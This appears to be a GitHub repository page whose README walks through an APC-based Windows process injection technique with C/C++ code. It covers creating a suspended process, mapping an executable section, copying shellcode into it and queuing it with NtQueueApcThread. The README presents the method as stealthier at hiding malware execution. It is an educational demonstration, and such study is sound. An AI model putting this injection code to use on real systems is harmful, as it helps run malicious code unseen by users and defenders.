Switch branches/tags
Nothing to show
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
..
Failed to load latest commit information.
CreateSectionAPC.cpp
CreateSectionAPC.h
CreateSectionAPC.vcxproj
CreateSectionAPC.vcxproj.filters
README.md

README.md

Overview

This method is almost the same as CreateSection: the only difference is that the thread containing the shellcode will be put in an Asynchronous Procedure Calls queue.

An executable section will be created, just as CreateSection: this time however, the section entrypoint, containing the shellcode, will be put in an Asynchronous Procedure Calls (APC) queue to finally run it. This technique is stealthier than the CreatePatched one since there are no apperent signs of malware being executed. For demonstration purposes, the target process will be manually created since we do not want to inject into already running applications into the system.

For the sake of clarity, from now on the executable that is injecting the code will be referred as injector process while the application which will be attacked will be the target process.

Process creation

The first thing that has to be done is to create a legit process with CreateProcess(). This is accomplished in this way: (source)

if (!CreateProcessW((LPWSTR)app_path, // lpApplicationName
                            NULL,             // lpCommandLine
                            NULL,             // lpProcessAttributes
                            NULL,             // lpThreadAttributes
                            NULL,             // bInheritHandles
                            CREATE_SUSPENDED | DETACHED_PROCESS |
                            CREATE_NO_WINDOW, // dwCreationFlags
                            NULL,                 // lpEnvironment
                            NULL,                 // lpCurrentDirectory
                            &si,                  // lpStartupInfo
                            &pi                   // lpProcessInformation
                        )) {
    DBG_ERROR(("CreateProcess failed, Error = %x\n", GetLastError()));
    return -1;
}

Note the CREATE_SUSPENDED flag stops the application from starting automatically after the function call. If the operation succeeds, the pi structure will contain all the information about the newly spawned process.

The execution of the application will be resumed later.

Section creation

It is now time to create the executable section. It will not be bind to any process, yet. (source)

if ((status = ZwCreateSection(&hShellcode, SECTION_ALL_ACCESS, NULL, &maxSize,
                            PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) !=
    STATUS_SUCCESS) {
    DBG_ERROR(("ZwCreateSection failed, status : %x\n", status));
    return -1;
}

There are several important variables being passed to ZwCreateSection(): &hSection, SECTION_ALL_ACCESS and PAGE_EXECUTE_READWRITE.

hSection is the section handle: it will represent our new section.

SECTION_ALL_ACCESS is a bitwise flag which basically grants every permission to the section.

Finally, PAGE_EXECUTE_READWRITE makes the section's memory page readable, writeable and executable.

Memory mapping

In order to write into the section, we will have to map a view, a whole or partial mapping of a section object, in the virtual address space of a process.

MapSection

The first step is to bind the section to the injector process' context in order to copy the shellcode in it. This is done with NtMapViewOfSection(): its second parameter, in this case the HANDLE returned by GetCurrentProcess(), defines in which process the section will be mapped. (source)

if ((status = NtMapViewOfSection(hShellcode, GetCurrentProcess(),
                                &shellcodeSection, NULL, NULL, NULL,
                                &viewSize, inheritDisposition, NULL,
                                PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) {
    DBG_ERROR(("NtMapViewOfSection failed, status : %x\n", status));
    return -1;
}

Once the shellcode has been copied, we can proceed to map the section into the target process. (source)

if ((status =
        NtMapViewOfSection(hSection, pi.hProcess, &sectionBaseAddress2, NULL,
                            NULL, NULL, &viewSize, inheritDisposition, NULL,
                            PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) {
    DBG_ERROR(("NtMapViewOfSection failed, status : %x\n", status));
    return -1;
}

Finally, we have to unmap the view from the injector. The section handle hSection is closed and set to NULL afterwards. (source)

ZwUnmapViewOfSection(GetCurrentProcess(), shellcodeSection);
ZwClose(hShellcode);
hShellcode = NULL;

Shellcode execution

The last thing to check out is the actual shellcode execution. This can be achieved by creating a new entry in the APC queue of the process: this entry will point to the entrypoint of the shellcode, injectedBaseAddress. In this way, the next time the thread is scheduled, it will run the APC function. (source)

if ((status = NtQueueApcThread(pi.hThread, injectedBaseAddress, 0, 0, 0)) !=
    STATUS_SUCCESS) {
    DBG_ERROR(("NtQueueApcThread failed, status : %x\n", status));
    return -1;
}
DBG_SUCC(("Thread created."));

DBG_SUCC(("Resuming main thread...\n"));
ZwSetInformationThread(pi.hThread, 1, NULL, NULL);
ResumeThread(pi.hThread);

Resources